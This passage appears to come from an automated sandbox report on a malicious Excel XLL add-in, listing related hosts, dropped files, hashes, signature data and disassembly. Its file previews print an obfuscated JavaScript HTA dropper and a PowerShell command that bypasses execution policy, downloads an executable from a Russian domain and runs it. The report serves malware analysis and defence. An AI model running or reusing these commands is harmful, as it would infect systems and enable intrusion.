                                                                                                                                                  • 54.235.175.90
                                                                                                                                                  0706_1050501748839.docGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.220.248
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 23.21.173.155
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.246.238
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 54.225.245.108
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.246.238
                                                                                                                                                  0706_1715044809783.docGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.175.90
                                                                                                                                                  niberius.dllGet hashmaliciousBrowse
                                                                                                                                                  • 23.21.211.162
                                                                                                                                                  kURQyzESXZ.dllGet hashmaliciousBrowse
                                                                                                                                                  • 52.20.197.7
                                                                                                                                                  nimb.dllGet hashmaliciousBrowse
                                                                                                                                                  • 23.21.136.132
                                                                                                                                                  4h2yLkN8DO.dllGet hashmaliciousBrowse
                                                                                                                                                  • 23.23.104.250
                                                                                                                                                  aJuocCMPkL.exeGet hashmaliciousBrowse
                                                                                                                                                  • 34.225.31.148
                                                                                                                                                  TejsR02giJ.exeGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.190.106
                                                                                                                                                  CvRqP96UZw.exeGet hashmaliciousBrowse
                                                                                                                                                  • 100.25.107.227

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\Public\res32.hta
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8419
                                                                                                                                                  Entropy (8bit):5.163512636419693
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:/arm5dHoAR5V98geGR4qUg3fjRORjkSRQvRIPLBaGxmBWzMIAlPoP8L7T:/audHjf98lRqTP9UgYCGNaGxmNDlo8L3
                                                                                                                                                  MD5:71999A9D2F15E164C9B1FA926AA6444B
                                                                                                                                                  SHA1:C1FBD2B6458B474A208B6CC710951940C9290E5C
                                                                                                                                                  SHA-256:DA92436D2BBCDEF52B11ACE6E2E063E9971CEFC074D194550BD425305C97CDD5
                                                                                                                                                  SHA-512:298EAAB6D157E81BB738B1605285A0D14B05AE3656F1BBF72C4921C78B74BE7048B6744144469CB4EF48F4D4D233F794C366F192765A4F193C48B2DE2EFF4C27
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >....<html>..<body>....<script language="javascript">..var _0x8c86 = [.. 'W6RcUHHOW4dcUSocyZGj',.. 'WQBdGaO7WPqZW73dIq',.. 'W4pcLqKgyCkGaaHJW6O',.. 'W4hcOqzBnmo7W7HC',.. 'bWFcVWmEW4fSxsldUSoKWPW',.. 'WQxcUs0tWQG2W74',.. 'yfC1W6BcPef7W6ldJdu',.. 'WPVcJSoCnHyuWRNdHmkHWPbYWQK',.. 'W57cKCoKiCkGW5/cPZrZmW',.. 'WQxdHxzcW7WBW4BdVqnvWPm',.. 'W5NdTCklAg8dWPhdPSk0WR9JWQ3cLSo4WPpdN2O',.. 'zg5jW70/wJ1eW4lcOK/cHG',.. 'WPbyBmoUWPDzkblcJWHYcq',.. 'W7ldUt/cN8kdWPNcQty',.. 'aahdHuTHWP9DqG',.. 'WQdcMbi8WOSxW7q',.. 'W7iQnmo+DCkVzSoc',.. 'W5WHrvJcTmoFEw/cRSolcmo5mmoI',.. 'k8ofemkaW5PbzczLlcXQ',.. 'W7hdUMpdHCo8W5FcKHqqye9M',.. 'a8opcSkonCkOrq',.. 'WPb5WQVdV0hcQSk7W58',.. 'y1DLWRxcKe1oW6a',.. 'W53cKSoPk8oPW5dcLdzuiCk+',.. 'W48dx8kNWPVdIXzeiSoDW6RdMmk4WOZcGmkqgd7dKCk/WR7cLSoQWRL6W4XRee3dKmopiL3cMJm5iCkgW67cMLuxW73cMrldNCkvCfZdKCo5zmolW5tcJvdcISoLW6ONW77dS8k4tm
                                                                                                                                                  C:\Users\Public\snd32sys.exe
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):763392
                                                                                                                                                  Entropy (8bit):6.644646436393566
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:4AbvaOTfFGikmS6jd2QML8HXWp8KEwbHBkm9jjgbFHLViv0dC2x0uTadTaUk7u:vbvJfFGikmS0pXfw7Bkm9j088PlTaDj
                                                                                                                                                  MD5:ED1921467F6784AF6BDCA40A06A541B5
                                                                                                                                                  SHA1:63B70725C3298D5FA17277EC64C77A4B6FBCF697
                                                                                                                                                  SHA-256:3DB14214A9EB98B3B5ABFFCB314C808A25ED82456CE01251D31E8EA960F6E4E6
                                                                                                                                                  SHA-512:A30779D84521049F4CEBA11B0F0B16430DB8A38FF38AB540585C9AE89D7214655E0C5C246E21E97AB65D8F3DC0D472DDB8BDA1E01AF82E632C66A2CCD159F020
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c..m...m...m......m.......m......m......m...m...m......m......m.......m..Rich.m..................PE..L....<.`.................b...................................................p......W.....@..................................u..........@.................... ..@G..p9..T............................9..@............................................text....`.......b.................. ..`.rdata..P............f..............@..@.data............^...l..............@....rsrc...@...........................@..@.reloc..@G... ...H...^..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\F2E779D9-2A7F-4724-B0D9-67BDDA1F0003
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):135209
                                                                                                                                                  Entropy (8bit):5.363084368102766
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:qcQIKNgeBTA3gBwlpQ9DQW+zoY34ZliKWXboOidX5E6LWME9:MEQ9DQW+zwXO1
                                                                                                                                                  MD5:585F16F872D700ED9074C9599BFCAA8D
                                                                                                                                                  SHA1:A7B0CEC26282A4EBDD6B8A336B6C922EB7CCB546
                                                                                                                                                  SHA-256:27F46B4BD834974CEEC3353473B97BCF16BD3AF5FBD14BEC8340D2B8048BA237
                                                                                                                                                  SHA-512:94B68F6C6BF74CFCE8CF9D3E908EB674EDF0F93B097885301BF60B6D536BC38FB596DE3047142BCBF8F879FC417632F11B4BDCAFB8C4C4C8AFBCB1BCDF34C73C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-07-08T14:30:08">.. Build: 16.0.14306.30528-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):17512
                                                                                                                                                  Entropy (8bit):5.575682556842605
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:qtpOrhtOomtrzRkSBKnKileIoK7Q99gtSJQpO1ViYbR:H4KKiler98tRC7l
                                                                                                                                                  MD5:804765CA20FB452B7AFDC20F54DDC5BC
                                                                                                                                                  SHA1:1E475060FAC7DC9546B6DF29B78D139485F5E105
                                                                                                                                                  SHA-256:1E64FB0B2717B6E64DC2C096EF0169206D5C25A854760C212FBA76EF5E362E51
                                                                                                                                                  SHA-512:2887822470F0F2C21FC08F7DF3EBEBF873E9844C62F5666A66D43D1345E003BCB6A8CDDFDAC42ADA6C34C750092E2190F2B5460E531382E1604493FD6E4BA6A6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: @...e.......................7.(.k.....].7............@..........H...............<@.^.L."My...:D..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)R.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].2.....%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_021oib5j.5er.ps1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33lmhbcg.erz.psm1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l5bzl405.f5n.psm1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m31y4pff.piz.ps1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\Documents\20210708\PowerShell_transcript.888683.0syxhOX+.20210708163014.txt
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1205
                                                                                                                                                  Entropy (8bit):5.311205245712001
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:BxSA5xvBnnDx2DOXUWTLST1lDPWKHjeTKKjX4CIym1ZJXgrLST1lDRnxSAZ0:BZLvhDoOXu1cKqDYB1ZUu1vZZ0
                                                                                                                                                  MD5:45D933EF1A814178B4C30D1C511EEA62
                                                                                                                                                  SHA1:92AB0E5235A9C4FED5941154906879B3C51F8FD2
                                                                                                                                                  SHA-256:FF3092607FC1517161D2C45D1014A05475343498EEFC44C7C834FB81661D7688
                                                                                                                                                  SHA-512:16EE676884C815562AD21973E371EDB772514726DA50D1DDE806BA92A4335871DAF897D90A89FA8C5F963E4F34728716C4048EBDC763A8E419CEB7C67BF5B35F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210708163025..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 888683 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'..Process ID: 5944..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210708163026..**********************..PS>poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'....********
                                                                                                                                                  C:\Users\user\Documents\20210708\PowerShell_transcript.888683.93l2YHGR.20210708163033.txt
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1066
                                                                                                                                                  Entropy (8bit):5.2109369727717985
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:BxSADxvBnnDx2DOXUW4L1+WEHjeTKKjX4CIym1ZJXsNnxSAZNq:BZtvhDoOs1pEqDYB1ZOxZZNq
                                                                                                                                                  MD5:2DB1F1A4DD113B692007B7089DE7A226
                                                                                                                                                  SHA1:03920B9D36563DFB26E0408BD2A9DE9B8914F0FE
                                                                                                                                                  SHA-256:9815EE4EF24399DA60B77429BFB41E1D5BCDEB7B5FBA7DC2F4B9C442B7264215
                                                                                                                                                  SHA-512:A4788DA06C4FA30BD8302AF771B08EC605B72C06FA10A50671143E95DBD816D2264A9C5AE640B4783153F5A6A51413CC447CEEE15FE3EC1E8818F1DE2807B2BA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210708163045..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 888683 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EX bYpASs -NOp -w 1 WGeT http://srand04rf.ru/08.jpg -OuTfIle c:\Users\Public\snd32sys.exe..Process ID: 5788..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210708163046..**********************..PS>WGeT http://srand04rf.ru/08.jpg -OuTfIle c:\Users\Public\snd32sys.exe..**********************..Command start time: 20210708163350..**********************..PS>$global:?..True..**********************..Windows PowerShell

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Entropy (8bit):6.069104587121557
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                  • VXD Driver (31/22) 0.00%
                                                                                                                                                  File name:0708_5355150121.xll
                                                                                                                                                  File size:24488
                                                                                                                                                  MD5:41e0318dfdb1c180a375a7efc712649e
                                                                                                                                                  SHA1:f0c230010c7b85544c25879d4daf74479360e1bc
                                                                                                                                                  SHA256:73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71
                                                                                                                                                  SHA512:b20ec32ba9f7269deda4f70e655bb7a105dde896524bfd9c788605f2a0a26bc3bc7ddceed93c4f7b14404a65107647a9b9840c8adec32c12d92138b69805cc17
                                                                                                                                                  SSDEEP:384:Er7ozcN5pozcU7ZHW7pw0jGWdqFQv6HovAcdKhKAUgLysGpwKNsc8kYN5:ika52naz78+KKd81UgLJc8ks
                                                                                                                                                  File Content Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L......`...........!...I.....@......................................................9s....@.............................B..

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:80b6f2d2f6f6d2cc

                                                                                                                                                  Static PE Info

                                                                                                                                                  General

                                                                                                                                                  Entrypoint:0xcd418fb
                                                                                                                                                  Entrypoint Section:.img
                                                                                                                                                  Digitally signed:true
                                                                                                                                                  Imagebase:0xcd40000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE
                                                                                                                                                  Time Stamp:0x60E5C2AB [Wed Jul 7 15:05:15 2021 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:1
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:1
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:1
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:8fc6d9b5f93578c52ec239ef6c29b5ac

                                                                                                                                                  Authenticode Signature

                                                                                                                                                  Signature Valid:false
                                                                                                                                                  Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                                                  Signature Validation Error:A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
                                                                                                                                                  Error Number:-2146762495
                                                                                                                                                  Not Before, Not After
                                                                                                                                                  • 6/8/2021 5:00:00 PM 6/9/2022 4:59:59 PM
                                                                                                                                                  Subject Chain
                                                                                                                                                  • CN=Storeks LLC, O=Storeks LLC, L=Moscow, C=RU
                                                                                                                                                  Version:3
                                                                                                                                                  Thumbprint MD5:D8E818AC7AC0DB90212FAB404C566D4C
                                                                                                                                                  Thumbprint SHA-1:91319E6A55BF0EF68DB8AFB31845AB961356175F
                                                                                                                                                  Thumbprint SHA-256:127B54C50D77A329A145B0A5686E2214D2ED40482C0375D0DE278BA4A135DEDE
                                                                                                                                                  Serial:1E5EFA53A14599CC82F56F0790E20B17

                                                                                                                                                  Entrypoint Preview

                                                                                                                                                  Instruction
                                                                                                                                                  mov eax, 00000001h
                                                                                                                                                  retn 000Ch
                                                                                                                                                  sub esp, 00001254h
                                                                                                                                                  call 00007FBDDC907867h
                                                                                                                                                  imul eax, dword ptr [eax], 65h
                                                                                                                                                  add byte ptr [edx+00h], dh
                                                                                                                                                  outsb
                                                                                                                                                  add byte ptr [ebp+00h], ah
                                                                                                                                                  insb
                                                                                                                                                  add byte ptr [ebx], dh
                                                                                                                                                  add byte ptr [edx], dh
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add al, ch
                                                                                                                                                  sti
                                                                                                                                                  add al, byte ptr [eax]
                                                                                                                                                  add byte ptr [ecx+000DE8C3h], cl
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  dec esp
                                                                                                                                                  outsd
                                                                                                                                                  popad
                                                                                                                                                  dec esp
                                                                                                                                                  imul esp, dword ptr [edx+72h], 57797261h
                                                                                                                                                  add byte ptr [ebx-18h], dl
                                                                                                                                                  pop edx
                                                                                                                                                  add eax, dword ptr [eax]
                                                                                                                                                  add byte ptr [ecx+000FE8C7h], cl
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  inc edi
                                                                                                                                                  je 00007FBDDC9078A3h
                                                                                                                                                  jc 00007FBDDC9078C1h
                                                                                                                                                  arpl word ptr [ecx+64h], ax
                                                                                                                                                  jc 00007FBDDC9078B8h
                                                                                                                                                  jnc 00007FBDDC9078C5h
                                                                                                                                                  add byte ptr [ebx-18h], dl
                                                                                                                                                  add eax, dword ptr [eax]
                                                                                                                                                  add byte ptr [ecx+001AE8C6h], cl
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  inc ebp
                                                                                                                                                  js 00007FBDDC9078C2h
                                                                                                                                                  popad
                                                                                                                                                  outsb
                                                                                                                                                  inc ebp
                                                                                                                                                  outsb
                                                                                                                                                  jbe 00007FBDDC9078BBh
                                                                                                                                                  jc 00007FBDDC9078C1h
                                                                                                                                                  outsb
                                                                                                                                                  insd
                                                                                                                                                  outsb
                                                                                                                                                  je 00007FBDDC9078A5h
                                                                                                                                                  je 00007FBDDC9078C4h
                                                                                                                                                  imul ebp, dword ptr [esi+67h], 53005773h
                                                                                                                                                  call esi
                                                                                                                                                  push 00000104h
                                                                                                                                                  lea edx, dword ptr [esp+00001010h]
                                                                                                                                                  push edx
                                                                                                                                                  call 00007FBDDC90787Bh
                                                                                                                                                  and eax, 55005000h
                                                                                                                                                  add byte ptr [edx+00h], al
                                                                                                                                                  dec esp
                                                                                                                                                  add byte ptr [ecx+00h], cl
                                                                                                                                                  inc ebx
                                                                                                                                                  add byte ptr [72005C00h], ah
                                                                                                                                                  add byte ptr [ebp+00h], ah
                                                                                                                                                  jnc 00007FBDDC907852h
                                                                                                                                                  xor eax, dword ptr [eax]
                                                                                                                                                  xor al, byte ptr [eax]
                                                                                                                                                  add byte ptr [eax+00h], ch
                                                                                                                                                  je 00007FBDDC907852h
                                                                                                                                                  popad
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add bh, bh
                                                                                                                                                  shr al, 1
                                                                                                                                                  or al, 00h
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  inc ebx
                                                                                                                                                  jc 00007FBDDC9078B7h
                                                                                                                                                  popad

                                                                                                                                                  Data Directories

                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x90000x42.edata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x10000xf05.img
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x46000x19a8
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000x8.reloc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                  Sections

                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  .img0x10000xf050xe00False0.495256696429data5.15354590708IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .ico0x20000x10000x1000False0.122802734375data1.29754900082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .fyjrtr0x30000x10000x1000False0.566650390625data5.36518457685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rytkrer0x40000x10000x1000False0.767822265625data6.70050253557IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .reyery0x50000x2000x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .txt0x60000x2000x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .data0x70000x2000x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .res0x80000x2000x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .edata0x90000x420x200False0.103515625data0.543966493249IMAGE_SCN_MEM_READ
                                                                                                                                                  .reloc0xa0000x80x200False0.03515625data0.0203931352361IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                  Imports

                                                                                                                                                  DLLImport
                                                                                                                                                  msvbvm60.dll__vbaLateIdSt, __vbaBoolVar, rtcStringBstr, rtcRightTrimBstr, rtcEndOfFile, __vbaBoolVarNull, __vbaNextEachCollObj, rtcAbsVar, TipCreateInstanceEx, __vbaDerefAry1, __vbaFpUI1, rtcKillFiles, __vbaVarCmpLt, SetMemObj, __vbaForEachVar, BASIC_CLASS_QueryInterface, rtcEnvironBstr, EbLibraryLoad, Zombie_QueryInterface, rtR4FromErrVar, rtcMakeDir, VarPtr, PutMem2, rtcGetTimeValue, rtcPackDate, rtcCommandVar
